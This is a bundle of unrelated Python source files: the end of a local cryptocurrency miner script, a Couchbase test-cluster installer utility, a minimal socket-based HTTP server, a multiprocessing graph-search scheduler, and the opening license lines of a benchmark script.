settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 2342
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
install_utils.py
|
import getopt
import re
import subprocess
import sys
import threading
import time
sys.path = [".", "lib"] + sys.path
import testconstants
from remote.remote_util import RemoteMachineShellConnection, RemoteUtilHelper
from membase.api.rest_client import RestConnection
import install_constants
import TestInput
import logging.config
import os.path
logging.config.fileConfig("scripts.logging.conf")
log = logging.getLogger()
NodeHelpers = []
# Default params
params = {
"version": None,
"install_tasks": install_constants.DEFAULT_INSTALL_TASKS,
"url": None,
"debug_logs": False,
"cb_edition": install_constants.CB_ENTERPRISE,
"timeout": install_constants.INSTALL_TIMEOUT,
"all_nodes_same_os": False,
"skip_local_download": True,
"storage_mode": "plasma",
"disable_consistency": False,
"enable_ipv6": False,
"use_domain_names": False,
"fts_quota": testconstants.FTS_QUOTA,
"fts_query_limit": 0
}
class build:
def __init__(self, name, url, path, product="cb"):
self.name = name
self.url = url
self.path = path
self.product = product
self.version = params["version"]
class NodeHelper:
def __init__(self, node):
self.node = node
self.ip = node.ip
self.params = params
self.build = None
self.queue = None
self.thread = None
self.rest = None
self.install_success = False
self.connect_ok = False
self.shell = None
self.info = None
self.enable_ipv6 = False
self.check_node_reachable()
self.nonroot = self.shell.nonroot
self.actions_dict = install_constants.NON_ROOT_CMDS if self.nonroot else install_constants.CMDS
def check_node_reachable(self):
start_time = time.time()
        # Retry for up to 60 seconds (roughly three attempts, 20s apart)
while time.time() < start_time + 60:
try:
self.shell = RemoteMachineShellConnection(self.node, exit_on_failure=False)
self.info = self.shell.extract_remote_info()
self.connect_ok = True
if self.connect_ok:
break
except Exception as e:
log.warning("{0} unreachable, {1}, retrying..".format(self.ip, e))
time.sleep(20)
def get_os(self):
os = self.info.distribution_version.lower()
to_be_replaced = ['\n', ' ', 'gnu/linux']
for _ in to_be_replaced:
if _ in os:
os = os.replace(_, '')
if self.info.deliverable_type == "dmg":
major_version = os.split('.')
os = major_version[0] + '.' + major_version[1]
return os
def uninstall_cb(self):
need_nonroot_relogin = False
if self.shell.nonroot:
self.node.ssh_username = "root"
self.shell = RemoteMachineShellConnection(self.node, exit_on_failure=False)
need_nonroot_relogin = True
if self.actions_dict[self.info.deliverable_type]["uninstall"]:
cmd = self.actions_dict[self.info.deliverable_type]["uninstall"]
if "msi" in cmd:
'''WINDOWS UNINSTALL'''
self.shell.terminate_processes(self.info, [s for s in testconstants.WIN_PROCESSES_KILLED])
self.shell.terminate_processes(self.info, \
[s + "-*" for s in testconstants.COUCHBASE_FROM_VERSION_3])
installed_version, _ = self.shell.execute_command(
"cat " + install_constants.DEFAULT_INSTALL_DIR["WINDOWS_SERVER"] + "VERSION.txt")
if len(installed_version) == 1:
installed_msi, _ = self.shell.execute_command(
"cd " + install_constants.DOWNLOAD_DIR["WINDOWS_SERVER"] + "; ls *" + installed_version[
0] + "*.msi")
if len(installed_msi) == 1:
self.shell.execute_command(
self.actions_dict[self.info.deliverable_type]["uninstall"].replace("installed-msi",
installed_msi[0]))
for browser in install_constants.WIN_BROWSERS:
self.shell.execute_command("taskkill /F /IM " + browser + " /T")
else:
duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["uninstall"]
start_time = time.time()
while time.time() < start_time + timeout:
try:
o, e = self.shell.execute_command(cmd, debug=self.params["debug_logs"])
if o == ['1']:
break
self.wait_for_completion(duration, event)
except Exception as e:
log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
self.wait_for_completion(duration, event)
self.shell.terminate_processes(self.info, install_constants.PROCESSES_TO_TERMINATE)
if need_nonroot_relogin:
self.node.ssh_username = "nonroot"
self.shell = RemoteMachineShellConnection(self.node, exit_on_failure=False)
def pre_install_cb(self):
if self.actions_dict[self.info.deliverable_type]["pre_install"]:
cmd = self.actions_dict[self.info.deliverable_type]["pre_install"]
duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["pre_install"]
if cmd is not None and "HDIUTIL_DETACH_ATTACH" in cmd:
start_time = time.time()
while time.time() < start_time + timeout:
try:
ret = hdiutil_attach(self.shell, self.build.path)
if ret:
break
self.wait_for_completion(duration, event)
except Exception as e:
log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
self.wait_for_completion(duration, event)
def install_cb(self):
self.pre_install_cb()
if self.actions_dict[self.info.deliverable_type]["install"]:
if "suse" in self.get_os():
cmd = self.actions_dict[self.info.deliverable_type]["suse_install"]
else:
cmd = self.actions_dict[self.info.deliverable_type]["install"]
cmd = cmd.replace("buildbinary", self.build.name)
cmd = cmd.replace("buildpath", self.build.path)
cmd = cmd.replace("mountpoint", "/tmp/couchbase-server-" + params["version"])
duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["install"]
start_time = time.time()
while time.time() < start_time + timeout:
try:
o, e = self.shell.execute_command(cmd, debug=self.params["debug_logs"])
if o == ['1']:
break
self.wait_for_completion(duration, event)
except Exception as e:
log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
self.wait_for_completion(duration, event)
self.post_install_cb()
def post_install_cb(self):
duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["post_install"]
start_time = time.time()
while time.time() < start_time + timeout:
try:
if self.actions_dict[self.info.deliverable_type]["post_install"]:
cmd = self.actions_dict[self.info.deliverable_type]["post_install"].replace("buildversion", self.build.version)
o, e = self.shell.execute_command(cmd, debug=self.params["debug_logs"])
if o == ['1']:
break
else:
if self.actions_dict[self.info.deliverable_type]["post_install_retry"]:
if self.info.deliverable_type == "msi":
check_if_downgrade, _ = self.shell.execute_command(
"cd " + install_constants.DOWNLOAD_DIR["WINDOWS_SERVER"] +
"; vi +\"set nobomb | set fenc=ascii | x\" install_status.txt; "
"grep 'Adding WIX_DOWNGRADE_DETECTED property' install_status.txt")
print((check_if_downgrade * 10))
else:
self.shell.execute_command(
self.actions_dict[self.info.deliverable_type]["post_install_retry"],
debug=self.params["debug_logs"])
self.wait_for_completion(duration, event)
except Exception as e:
log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
self.wait_for_completion(duration, event)
def set_cbft_env_options(self, name, value, retries=3):
if self.get_os() in install_constants.LINUX_DISTROS:
while retries > 0:
if self.shell.file_exists("/opt/couchbase/bin/", "couchbase-server"):
ret, _ = self.shell.execute_command(install_constants.CBFT_ENV_OPTIONS[name].format(value))
self.shell.stop_server()
self.shell.start_server()
time.sleep(10)
if ret == ['1']:
log.info("{0} set to {1} on {2}".format(name, value, self.ip))
break
else:
time.sleep(20)
retries -= 1
else:
print_result_and_exit("Unable to set fts_query_limit on {0}".format(self.ip))
def _get_cli_path(self):
if self.get_os() in install_constants.LINUX_DISTROS:
return install_constants.DEFAULT_CLI_PATH["LINUX_DISTROS"]
elif self.get_os() in install_constants.MACOS_VERSIONS:
return install_constants.DEFAULT_CLI_PATH["MACOS_VERSIONS"]
elif self.get_os() in install_constants.WINDOWS_SERVER:
return install_constants.DEFAULT_CLI_PATH["WINDOWS_SERVER"]
def _set_ip_version(self):
if params["enable_ipv6"]:
self.enable_ipv6 = True
if self.node.ip.startswith("["):
hostname = self.node.ip[self.node.ip.find("[") + 1:self.node.ip.find("]")]
else:
hostname = self.node.ip
cmd = install_constants.NODE_INIT["ipv6"].format(self._get_cli_path(),
self.ip,
hostname,
self.node.rest_username,
self.node.rest_password)
else:
cmd = install_constants.NODE_INIT["ipv4"].format(self._get_cli_path(),
self.ip,
self.node.rest_username,
self.node.rest_password)
self.shell.execute_command(cmd)
def pre_init_cb(self):
try:
self._set_ip_version()
if params["fts_query_limit"] > 0:
self.set_cbft_env_options("fts_query_limit", params["fts_query_limit"])
except Exception as e:
log.warning("Exception {0} occurred during pre-init".format(e))
def post_init_cb(self):
# Optionally change node name and restart server
if params.get('use_domain_names', False):
RemoteUtilHelper.use_hostname_for_server_settings(self.node)
# Optionally disable consistency check
if params.get('disable_consistency', False):
self.rest.set_couchdb_option(section='couchdb',
option='consistency_check_ratio',
value='0.0')
def get_services(self):
if not self.node.services:
return ["kv"]
elif self.node.services:
return self.node.services.split(',')
def allocate_memory_quotas(self):
kv_quota = 0
info = self.rest.get_nodes_self()
start_time = time.time()
while time.time() < start_time + 30 and kv_quota == 0:
kv_quota = int(info.mcdMemoryReserved * testconstants.CLUSTER_QUOTA_RATIO)
time.sleep(1)
self.services = self.get_services()
if "index" in self.services:
log.info("Setting INDEX memory quota as {0} MB on {1}".format(testconstants.INDEX_QUOTA, self.ip))
self.rest.set_service_memoryQuota(service='indexMemoryQuota', memoryQuota=testconstants.INDEX_QUOTA)
kv_quota -= testconstants.INDEX_QUOTA
if "fts" in self.services:
log.info("Setting FTS memory quota as {0} MB on {1}".format(params["fts_quota"], self.ip))
self.rest.set_service_memoryQuota(service='ftsMemoryQuota', memoryQuota=params["fts_quota"])
kv_quota -= params["fts_quota"]
if "cbas" in self.services:
log.info("Setting CBAS memory quota as {0} MB on {1}".format(testconstants.CBAS_QUOTA, self.ip))
self.rest.set_service_memoryQuota(service="cbasMemoryQuota", memoryQuota=testconstants.CBAS_QUOTA)
kv_quota -= testconstants.CBAS_QUOTA
if "kv" in self.services:
if kv_quota < testconstants.MIN_KV_QUOTA:
log.warning("KV memory quota is {0}MB but needs to be at least {1}MB on {2}".format(kv_quota,
testconstants.MIN_KV_QUOTA,
self.ip))
kv_quota = testconstants.MIN_KV_QUOTA
log.info("Setting KV memory quota as {0} MB on {1}".format(kv_quota, self.ip))
self.rest.init_cluster_memoryQuota(self.node.rest_username, self.node.rest_password, kv_quota)
def init_cb(self):
duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["init"]
self.wait_for_completion(duration * 2, event)
start_time = time.time()
while time.time() < start_time + timeout:
try:
init_success = False
self.pre_init_cb()
self.rest = RestConnection(self.node)
# Make sure that data_path and index_path are writable by couchbase user
for path in set([_f for _f in [self.node.data_path, self.node.index_path] if _f]):
for cmd in ("rm -rf {0}/*".format(path),
"chown -R couchbase:couchbase {0}".format(path)):
self.shell.execute_command(cmd)
self.rest.set_data_path(data_path=self.node.data_path, index_path=self.node.index_path)
self.allocate_memory_quotas()
self.rest.init_node_services(hostname=None,
username=self.node.rest_username,
password=self.node.rest_password,
services=self.get_services())
if "index" in self.get_services():
self.rest.set_indexer_storage_mode(storageMode=params["storage_mode"])
self.rest.init_cluster(username=self.node.rest_username,
password=self.node.rest_password)
init_success = True
if init_success:
break
self.wait_for_completion(duration, event)
except Exception as e:
log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
self.wait_for_completion(duration, event)
self.post_init_cb()
def wait_for_completion(self, duration, event):
if params["debug_logs"]:
log.info(event.format(duration, self.ip))
time.sleep(duration)
def cleanup_cb(self):
cmd = self.actions_dict[self.info.deliverable_type]["cleanup"]
if cmd:
try:
# Delete all but the most recently accessed build binaries
self.shell.execute_command(cmd, debug=self.params["debug_logs"])
except:
#ok to ignore
pass
def _get_mounted_volumes(shell):
volumes, _ = shell.execute_command("ls /tmp | grep '{0}'".format("couchbase-server-"))
return volumes
def hdiutil_attach(shell, dmg_path):
volumes = _get_mounted_volumes(shell)
for volume in volumes:
shell.execute_command("hdiutil detach " + '"' + "/tmp/" + volume + '"')
shell.execute_command("umount " + '"' + "/tmp/" + volume + '"')
shell.execute_command("hdiutil attach {0} -mountpoint /tmp/{1}".
format(dmg_path, "couchbase-server-" + params["version"]))
return shell.file_exists("/tmp/", "couchbase-server-" + params["version"])
def get_node_helper(ip):
for node_helper in NodeHelpers:
if node_helper.ip == ip:
return node_helper
return None
def print_result_and_exit(err=None):
if err:
log.error(err)
success = []
fail = []
for server in params["servers"]:
node = get_node_helper(server.ip)
if not node or not node.install_success:
fail.append(server.ip)
elif node.install_success:
success.append(server.ip)
log.info("-" * 100)
for _ in fail:
log.error("INSTALL FAILED ON: \t{0}".format(_))
log.info("-" * 100)
for _ in success:
log.info("INSTALL COMPLETED ON: \t{0}".format(_))
log.info("-" * 100)
if len(fail) > 0:
sys.exit(1)
def process_user_input():
params = _parse_user_input()
_params_validation()
return params
def _parse_user_input():
try:
(opts, args) = getopt.getopt(sys.argv[1:], 'hi:p:', [])
for o, a in opts:
if o == "-h":
print_result_and_exit(install_constants.USAGE)
if len(sys.argv) <= 1:
print_result_and_exit(install_constants.USAGE)
userinput = TestInput.TestInputParser.get_test_input(sys.argv)
except IndexError:
print_result_and_exit(install_constants.USAGE)
except getopt.GetoptError as err:
print_result_and_exit(str(err))
# Mandatory params
if not userinput.servers:
print_result_and_exit("No servers specified. Please use the -i parameter." + "\n" + install_constants.USAGE)
else:
params["servers"] = userinput.servers
# Validate and extract remaining params
for key, value in list(userinput.test_params.items()):
if key == "debug_logs":
params["debug_logs"] = True if value.lower() == "true" else False
if key == "install_tasks":
tasks = []
for task in value.split('-'):
if task in install_constants.DEFAULT_INSTALL_TASKS and task not in tasks:
tasks.append(task)
if len(tasks) > 0:
params["install_tasks"] = tasks
log.info("INSTALL TASKS: {0}".format(params["install_tasks"]))
if "install" not in params["install_tasks"] and "init" not in params["install_tasks"]:
return params # No other parameters needed
if key == 'v' or key == "version":
if re.match('^[0-9\.\-]*$', value) and len(value) > 5:
params["version"] = value
if key == "url":
if value.startswith("http"):
params["url"] = value
else:
log.warning('URL:{0} is not valid, will use version to locate build'.format(value))
if key == "type" or key == "edition" and value.lower() in install_constants.CB_EDITIONS:
params["cb_edition"] = value.lower()
if key == "timeout" and int(value) > 60:
params["timeout"] = int(value)
if key == "storage_mode":
params["storage_mode"] = value
if key == "disable_consistency":
params["disable_consistency"] = True if value.lower() == "true" else False
if key == "skip_local_download":
params["skip_local_download"] = False if value.lower() == "false" else True
if key == "enable_ipv6":
if value.lower() == "true":
for server in params["servers"]:
if re.match('\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', server.ip):
print_result_and_exit(
"Cannot enable IPv6 on an IPv4 machine: {0}. Please run without enable_ipv6=True.".format(
server.ip))
params["enable_ipv6"] = True
if key == "fts_quota" and int(value) >= 256:
params["fts_quota"] = int(value)
if key == "fts_query_limit" and int(value) > 0:
params["fts_query_limit"] = int(value)
if not params["version"] and not params["url"]:
print_result_and_exit("Need valid build version or url to proceed")
return params
def __check_servers_reachable():
reachable = []
unreachable = []
for server in params["servers"]:
try:
RemoteMachineShellConnection(server, exit_on_failure=False)
reachable.append(server.ip)
except Exception as e:
log.error(e)
unreachable.append(server.ip)
if len(unreachable) > 0:
log.info("-" * 100)
for _ in unreachable:
log.error("INSTALL FAILED ON: \t{0}".format(_))
log.info("-" * 100)
for _ in reachable:
# Marking this node as "completed" so it is not moved to failedInstall state
log.info("INSTALL COMPLETED ON: \t{0}".format(_))
log.info("-" * 100)
sys.exit(1)
def _params_validation():
__check_servers_reachable()
# Create 1 NodeHelper instance per VM
for server in params["servers"]:
NodeHelpers.append(NodeHelper(server))
# Version compatibility
node_os = []
for node in NodeHelpers:
if node.get_os() not in install_constants.SUPPORTED_OS:
print_result_and_exit("Install on {0} OS is not supported".format(node.get_os()))
else:
node_os.append(node.get_os())
if len(set(node_os)) == 1:
params["all_nodes_same_os"] = True
_check_version_compatibility(NodeHelpers[0])
else:
for node in NodeHelpers:
_check_version_compatibility(node)
# TODO: check if cb version is compatible with os
def _check_version_compatibility(node):
pass
def pre_install_steps():
if "install" in params["install_tasks"]:
if params["url"] is not None:
if NodeHelpers[0].shell.is_url_live(params["url"]):
params["all_nodes_same_os"] = True
for node in NodeHelpers:
build_binary = __get_build_binary_name(node)
build_url = params["url"]
filepath = __get_download_dir(node) + build_binary
node.build = build(build_binary, build_url, filepath)
else:
print_result_and_exit("URL {0} is not live. Exiting.".format(params["url"]))
else:
for node in NodeHelpers:
build_binary = __get_build_binary_name(node)
build_url = __get_build_url(node, build_binary)
if not build_url:
print_result_and_exit(
"Build is not present in latestbuilds or release repos, please check {0}".format(build_binary))
filepath = __get_download_dir(node) + build_binary
node.build = build(build_binary, build_url, filepath)
_download_build()
def _execute_local(command, timeout):
# -- Uncomment the below 2 lines for python 3
# process = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True).wait(timeout)
# process.communicate()[0].strip()
# -- python 2
process = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True).wait()
def __copy_thread(src_path, dest_path, node):
logging.info("Copying %s to %s" % (src_path, node.ip))
node.shell.copy_file_local_to_remote(src_path, dest_path)
logging.info("Done copying build to %s.", node.ip)
def _copy_to_nodes(src_path, dest_path):
copy_threads = []
for node in NodeHelpers:
copy_to_node = threading.Thread(target=__copy_thread, args=(src_path, dest_path, node))
copy_threads.append(copy_to_node)
copy_to_node.start()
for thread in copy_threads:
thread.join()
def __get_build_url(node, build_binary):
if params["enable_ipv6"]:
ipv6_url = "{0}{1}/{2}/{3}".format(
testconstants.CB_FQDN_REPO,
testconstants.CB_VERSION_NAME[(params["version"]).split('-')[0][:-2]],
params["version"].split('-')[1],
build_binary)
if node.shell.is_url_live(ipv6_url, exit_if_not_live=False):
return ipv6_url
else:
latestbuilds_url = "{0}{1}/{2}/{3}".format(
testconstants.CB_REPO,
testconstants.CB_VERSION_NAME[(params["version"]).split('-')[0][:-2]],
params["version"].split('-')[1],
build_binary)
release_url = "{0}{1}/{2}/{3}".format(
testconstants.CB_RELEASE_REPO,
testconstants.CB_VERSION_NAME[(params["version"]).split('-')[0][:-2]],
params["version"].split('-')[1],
build_binary)
if node.shell.is_url_live(latestbuilds_url, exit_if_not_live=False):
return latestbuilds_url
elif node.shell.is_url_live(release_url, exit_if_not_live=False):
return release_url
return None
def _download_build():
if params["all_nodes_same_os"] and not params["skip_local_download"]:
check_and_retry_download_binary_local(NodeHelpers[0])
_copy_to_nodes(NodeHelpers[0].build.path, NodeHelpers[0].build.path)
else:
for node in NodeHelpers:
build_url = node.build.url
filepath = node.build.path
cmd = install_constants.DOWNLOAD_CMD[node.info.deliverable_type]
if "curl" in cmd:
cmd = cmd.format(build_url, filepath,
install_constants.WAIT_TIMES[node.info.deliverable_type]
["download_binary"])
elif "wget" in cmd:
cmd = cmd.format(__get_download_dir(node), build_url)
logging.info("Downloading build binary to {0}:{1}..".format(node.ip, filepath))
check_and_retry_download_binary(cmd, node)
log.debug("Done downloading build binary")
def check_and_retry_download_binary_local(node):
log.info("Downloading build binary to {0}..".format(node.build.path))
duration, event, timeout = install_constants.WAIT_TIMES[node.info.deliverable_type][
"download_binary"]
cmd = install_constants.WGET_CMD.format(__get_download_dir(node), node.build.url)
start_time = time.time()
while time.time() < start_time + timeout:
try:
_execute_local(cmd, timeout)
if os.path.exists(node.build.path):
break
time.sleep(duration)
except Exception as e:
log.warn("Unable to download build: {0}, retrying..".format(e.message))
time.sleep(duration)
else:
print_result_and_exit("Unable to download build in {0}s on {1}, exiting".format(timeout,
node.build.path))
def check_file_exists(node, filepath):
output, _ = node.shell.execute_command("ls -lh {0}".format(filepath), debug=params["debug_logs"])
for line in output:
if line.find('No such file or directory') == -1:
return True
return False
def check_and_retry_download_binary(cmd, node):
duration, event, timeout = install_constants.WAIT_TIMES[node.info.deliverable_type]["download_binary"]
start_time = time.time()
while time.time() < start_time + timeout:
try:
node.shell.execute_command(cmd, debug=params["debug_logs"])
if check_file_exists(node, node.build.path):
break
time.sleep(duration)
except Exception as e:
log.warning("Unable to download build: {0}, retrying..".format(e))
time.sleep(duration)
else:
print_result_and_exit("Unable to download build in {0}s on {1}, exiting".format(timeout, node.ip))
def __get_download_dir(node):
os = node.get_os()
if os in install_constants.LINUX_DISTROS:
if node.shell.nonroot:
return install_constants.NON_ROOT_DOWNLOAD_DIR['LINUX_DISTROS']
else:
return install_constants.DOWNLOAD_DIR["LINUX_DISTROS"]
elif os in install_constants.MACOS_VERSIONS:
return install_constants.DOWNLOAD_DIR["MACOS_VERSIONS"]
elif os in install_constants.WINDOWS_SERVER:
return install_constants.DOWNLOAD_DIR["WINDOWS_SERVER"]
def __get_build_binary_name(node):
# couchbase-server-enterprise-6.5.0-4557-centos7.x86_64.rpm
# couchbase-server-enterprise-6.5.0-4557-suse15.x86_64.rpm
# couchbase-server-enterprise-6.5.0-4557-rhel8.x86_64.rpm
# couchbase-server-enterprise-6.5.0-4557-oel7.x86_64.rpm
# couchbase-server-enterprise-6.5.0-4557-amzn2.x86_64.rpm
if node.get_os() in install_constants.X86:
return "{0}-{1}-{2}.{3}.{4}".format(params["cb_edition"],
params["version"],
node.get_os(),
node.info.architecture_type,
node.info.deliverable_type)
# couchbase-server-enterprise_6.5.0-4557-ubuntu16.04_amd64.deb
# couchbase-server-enterprise_6.5.0-4557-debian8_amd64.deb
# couchbase-server-enterprise_6.5.0-4557-windows_amd64.msi
elif node.get_os() in install_constants.AMD64:
if "windows" in node.get_os():
node.info.deliverable_type = "msi"
return "{0}_{1}-{2}_{3}.{4}".format(params["cb_edition"],
params["version"],
node.get_os(),
"amd64",
node.info.deliverable_type)
# couchbase-server-enterprise_6.5.0-4557-macos_x86_64.dmg
elif node.get_os() in install_constants.MACOS_VERSIONS:
return "{0}_{1}-{2}_{3}.{4}".format(params["cb_edition"],
params["version"],
"macos",
node.info.architecture_type,
node.info.deliverable_type)
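Every install/uninstall step above uses the same retry shape: loop until a per-step timeout from install_constants.WAIT_TIMES expires, swallow and log exceptions, sleep, and try again. A standalone sketch of that pattern (retry_until is illustrative and is not a helper defined in this module):

import logging
import time

log = logging.getLogger(__name__)

def retry_until(action, timeout, interval):
    # Call action() until it returns a truthy value or the timeout elapses.
    deadline = time.time() + timeout
    while time.time() < deadline:
        try:
            result = action()
            if result:
                return result
        except Exception as e:
            log.warning("attempt failed: {0}, retrying..".format(e))
        time.sleep(interval)
    return None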
|
saba_server.py
|
import socket
from threading import Thread
import sys
from urllib.parse import unquote, unquote_plus
from http.client import responses
import datetime
def _500():
return 'HTTP/1.1 500 {0}\r\n\r\n {0}\n'.format(responses[500]).encode("utf-8")
def _301(host, path):
print("{} {}".format(301, r:=responses[301]))
return 'HTTP/1.1 301 {0}\r\nLocation:http://{1}{2}\r\n\r\n {0}\n'.format(r, host, path[:-1]).encode("utf-8")
def remove_w(l, w=['']):
return [a for a in l if a not in w]
def make_formdata(others):
value_dic = {}
_, post_value = others.split('\r\n\r\n')
post_value= unquote_plus(post_value)
try:
for post_v in post_value.split('&'):
key, value = post_v.split('=', 1)
value_dic[key]=value
value_dic['error'] = False
except:
value_dic['error'] = True
return value_dic
def make_formdata_multi(others, val):
value_dic = {}
try:
_, post_value = others.split('\r\n\r\n',1)
value_dic['formdata'] = post_value
value_dic['boundary'] = val.split('=')[1]
value_dic['error'] = False
except:
value_dic['error'] = True
return value_dic
class Saba():
def __init__(self, app, host = '127.0.0.1', port = 8000):
self.host = host
self.port = port
self.request_queue_size = 50
self.app = app
def parse_request(self):
        # Parse request
# (method, path, protocol) : request line / others : request header
self.method, self.path, others = self.request_data.decode('iso-8859-1').split(' ', 2)
self.protocol, self.r_host, others = others.split('\r\n', 2)
self.path = unquote(self.path)
if '?' in self.path:
self.path, self.query = self.path.split('?', 1)
self.path = self.path+'/'
            if self.query and self.query[-1] == '/':
self.query = self.query[:-1]
else:
self.query=""
self.r_host = self.r_host.split(': ')[1]
value_dic = {}
self.content_type = ''
if self.method == 'POST':
for o in remove_w(others.split('\r\n')):
if len(o := o.split(': '))==2:
key, val = o
if key=='Content-Type':
if 'multipart/form-data' in val:
value_dic = make_formdata_multi(others, val)
elif val=='application/x-www-form-urlencoded':
value_dic = make_formdata(others)
self.content_type = val
self.post_value = value_dic
print('{} {} {}'.format(datetime.datetime.now(), self.method, self.path), end=' ')
def make_env(self):
env = {
'REQUEST_METHOD' : self.method,
'SCRIPT_NAME' : '',
'PATH_INFO' : self.path,
'QUERY_STRING' : self.query,
'CONTENT_TYPE':self.content_type,
'CONTENT_LENGTH':'',
'SERVER_NAME': 'saba_server/beta',
'SERVER_PORT': self.port,
'SERVER_PROTOCOL':self.protocol,
#HTTP_ Variables
'wsgi.version':(1,0),
'wsgi.url_scheme': "http",#https
'wsgi.input':self.request_data,
'wsgi.errors':sys.stderr,
'wsgi.multithread': True,
'wsgi.multiprocess': False,
'wsgi.run_once': False,
'saba_post_value':self.post_value
}
return env
# Return status & env.
def handle_one_request(self, conn):
self.request_data = b''
# Loop until all data is received.
while True:
# Receive data(maximum 4096 bytes).
data = conn.recv(4096)# Blocking
self.request_data += data
if (len(data)<4096) or (not data):
break
if self.request_data == b'':
return {'status':'500', 'env':None}
self.parse_request()
env = self.make_env()
if len(self.path.split('/')) == 3 and self.path[-1] == '/':
return {'status':'301', 'env':env, 'host':self.r_host}
return {'status':'200', 'env':env}
def keep_swimming(self):
# AF_INET : IPv4/ SOCK_STREAM : TCP/IP
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
# Set some socket options.
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Specify 'IP address' and 'port'.
s.bind((self.host, self.port))
# Wait for connection.
s.listen(self.request_queue_size)
while True:
                # Accept an incoming connection; returns the connection and the client address.
conn, _ = s.accept()
dic = self.handle_one_request(conn)
if dic['env'] is None:
continue
# Create thread.
thread = Thread(target=swimming, args=(conn, dic, self.app), daemon=True)
# Start thread.
thread.start()
#Loop handler.
def swimming(conn, dic, app):
env = dic['env']
    # Open the connection.
with conn:
if dic['status']=='301':
response_data = _301(dic['host'], env['PATH_INFO'])
else:
response_data = make_responce(env, app)
conn.sendall(response_data)
# Make response.
def make_responce(env, app):
headers = []
status_code = None
def start_response(s, h, exc_info=None):
nonlocal headers, status_code
status_code = s
headers = h
print(s)
response_data = app(env, start_response)
if response_data is None:
response_data=b''
content_length=0
else:
content_length=len(response_data)
status_line = "HTTP/1.1 {}".format(status_code).encode("utf-8")
if len(headers)==0 or status_code is None:
return _500()
else:
headers = [f"{k}: {v}" for k, v in headers]
headers.append('CONTENT_LENGTH: {}'.format(content_length))
headers = '\r\n'.join(headers).encode('utf-8')
response_data=status_line+b'\r\n'+headers+b'\r\n\r\n'+response_data[0]
return response_data
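A minimal way to exercise the server above (illustrative; hello_app is not part of this module). The app callable follows the WSGI-style contract make_responce expects: call start_response(status, headers) and return an iterable whose first element is the body bytes, since only response_data[0] is written to the socket.

def hello_app(environ, start_response):
    body = b"hello from saba\n"
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [body]

if __name__ == "__main__":
    # Serves http://127.0.0.1:8000/ until interrupted.
    Saba(hello_app).keep_swimming()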
|
Multithreading.py
|
from Algorithm import SearchTree, GraphContainer
from multiprocessing import Process, Queue
import time
def runJob(env, container, q):
tree = SearchTree(container, env)
iterations = 0
startTime = time.time()
for i in range(10000):
if container.isEmpty():
break
tree.nextItr()
iterations += 1
q.put((container, iterations))
def startThread(env, container, q):
tree = None
itr = 0
while len(container.graphs) < 250:
        if tree is None:
tree = SearchTree(container, env)
tree.nextItr()
itr += 1
miniCon = GraphContainer()
miniCon.graphs = container.graphs[:250]
container.graphs = container.graphs[250:]
Process(target=runJob, args=(env, miniCon, q)).start()
return itr
def findSolutionParrallel(env, container, threadCount):
startTime = time.time()
liveThreads = 0
itr = 0
q = Queue()
for i in range(threadCount):
if container.isEmpty():
break
itr += startThread(env, container, q)
liveThreads += 1
foundSolution = False
while liveThreads > 0 and not foundSolution:
miniCon, iterations = q.get()
liveThreads -= 1
itr += iterations
for graph in miniCon.graphs:
container.push(graph)
for solution in miniCon.solutions:
container.addSolution(solution)
foundSolution = True
if not foundSolution:
while liveThreads < threadCount:
if container.isEmpty():
break
itr += startThread(env, container, q)
liveThreads += 1
endTime = time.time()
elapsedTime = endTime - startTime
print('Iterations: {: >9,}, Open: {: >9,}, Solutions: {: >3,}, Time: {: >7,.1f}s ({: >7,.1f}g/s), Threads: {}'
.format(itr, len(container.graphs), len(container.solutions), elapsedTime, itr / elapsedTime, liveThreads))
return itr
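The scheduling above is a fan-out/collect pattern: each startThread call spawns a Process that reports back through a shared Queue, and the parent blocks on q.get() once per live worker. A self-contained sketch of that shape (the names here are illustrative and unrelated to the Algorithm module):

from multiprocessing import Process, Queue

def _worker(task_id, q):
    # Stand-in for runJob(): do some work, then report the result via the queue.
    q.put((task_id, task_id * task_id))

if __name__ == "__main__":
    q = Queue()
    workers = [Process(target=_worker, args=(i, q)) for i in range(4)]
    for p in workers:
        p.start()
    results = [q.get() for _ in workers]  # one result per started process
    for p in workers:
        p.join()
    print(results)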
|
run.py
|
# Copyright (c) 2020 Institution of Parallel and Distributed System, Shanghai Jiao Tong University
# ServerlessBench is licensed under the Mulan PSL v1.
# You can use this software according to the terms and conditions of the Mulan PSL v1.
# You may obtain a copy of Mulan PSL v1 at:
# http://license.coscl.org.cn/MulanPSL
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
